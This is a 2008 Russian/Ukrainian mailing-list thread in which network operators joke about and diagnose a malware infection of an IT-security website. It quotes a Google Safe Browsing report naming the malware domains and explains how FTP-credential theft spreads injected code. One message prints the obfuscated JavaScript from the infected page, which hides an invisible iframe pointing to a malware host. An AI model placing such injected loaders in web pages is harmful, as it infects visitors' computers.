Млять... труба :) Я досить добре знаю цю кантору. Знайомий з кількома її інструкторами звідти, котрі свого часу пару разів читали лекції в навчальному центрі Інкому. Прекрасні профі оті пацани були. Мдя... може вже специ звідти порозбігалися :))) 2008/9/1 Pavlo Narozhnyy

При заходе на сайт www.5-55.ru специализирующийся на ИТ безопасности получаем предупреждение от Google:

Safe Browsing *Diagnostic page for *www.5-55.ru/

*What is the current listing status for www.5-55.ru/?*

Site is listed as suspicious - visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 1 time(s) over the past 90 days.

*What happened when Google visited this site?*

Of the 1 pages we tested on the site over the past 90 days, 1 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 08/30/2008, and the last time suspicious content was found on this site was on 08/29/2008.

Malicious software includes 1 trojan(s). Successful infection resulted in an average of 7 new processes on the target machine.

Malicious software is hosted on 2 domain(s), including 78.109.30.0http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=uk&site=78.109.30.0, magic-cat.ruhttp://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=uk&site=magic-cat.ru.

2 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including rivatos.nethttp://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=uk&site=rivatos.net, magic-cat.ruhttp://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=uk&site=magic-cat.ru .

-- Regards, /oleh

Достаточно просто поставить гугль тулбар и включить проверку, насколько я знаю. On Mon, Sep 1, 2008 at 11:35 AM, Andrew Stesin wrote:

Класс. А как получать от гугла такие предупреждения?

2008/9/1 Pavlo Narozhnyy :

...

Of the 1 pages we tested on the site over the past 90 days, 1 page(s)

100% ;)

Ты-то под фрей, но большинство деммингов под виндой. Они схватят трояна который спам будет слать. 2008/9/1 Valentin Nechayev

Mon, Sep 01, 2008 at 11:23:01, paveln wrote about "[uanog] Из раздела юмор":

...

При заходе на сайт www.5-55.ru специализирующийся на ИТ безопасности получаем предупреждение от Google:

Ну открыл его, и не успел он загрузиться, как меня перекинуло куда-то на superporka.чего-то с фотками обнажённых органов. У меня Seamonkey 1.1.11 под фрёй.

Что это за сайт по IT безопасности, который такое позволяет делать с собой?

Кстати, такой же эффект (авторедирект на superporka) был несколько дней назад с одними оконщиками-остеклителями. Но тем хоть простительно, они не IT.

-netch-

причина прозаична - кто-то из админов на винде схватил вируса. Вирус прошерстил винчестер, нашел все логины на все ФТП сервера, прошелся по всем ФТП серверам, нашел веб-сайты, вгрузил свою веб-часть на все доступные веб-сервера. Процесс завертелся дальше. 2008/9/1 Valentin Nechayev

Mon, Sep 01, 2008 at 11:41:35, netch wrote about "Re: [uanog] Из раздела юмор":

...

Ну открыл его, и не успел он загрузиться, как меня перекинуло куда-то на superporka.чего-то с фотками обнажённых органов. У меня Seamonkey 1.1.11 под фрёй.

Что это за сайт по IT безопасности, который такое позволяет делать с собой?

Внутри начальной страницы:

<script>var source ="=jgsbnf!tsd>#iuuq;00sjwbupt/ofu0jo/dhj@je46#!xjeui>2!ifjhiu>2!tuzmf>#wjtjcjmjuz;!ijeefo#?=0jgsbnf?"; var result = ""; for(var i=0;i

Наш вебмастер говорит - 99.9% что вирус

-netch-

Hello! On Mon, 01 Sep 2008 at 11:48:31 (+0300), Valentin Nechayev wrote:

...

Ну открыл его, и не успел он загрузиться, как меня перекинуло куда-то на superporka.чего-то с фотками обнажённых органов. У меня Seamonkey 1.1.11 под фрёй.

...

Что это за сайт по IT безопасности, который такое позволяет делать с собой?

Внутри начальной страницы:

<script>var source ="=jgsbnf!tsd>#iuuq;00sjwbupt/ofu0jo/dhj@je46#!xjeui>2!ifjhiu>2!tuzmf>#wjtjcjmjuz;!ijeefo#?=0jgsbnf?"; var result = ""; for(var i=0;i

Наш вебмастер говорит - 99.9% что вирус

Да, вирус/троян. Очень распространённая фишка на юзерских хостингах =( Используются сохранённые в винде пароли к ftp'е и во все *.htm(l) дописывается такой код. Иногда через <script>, иногда просто <iframe>.

-netch-

-- George L. Yermulnik [YZ-RIPE]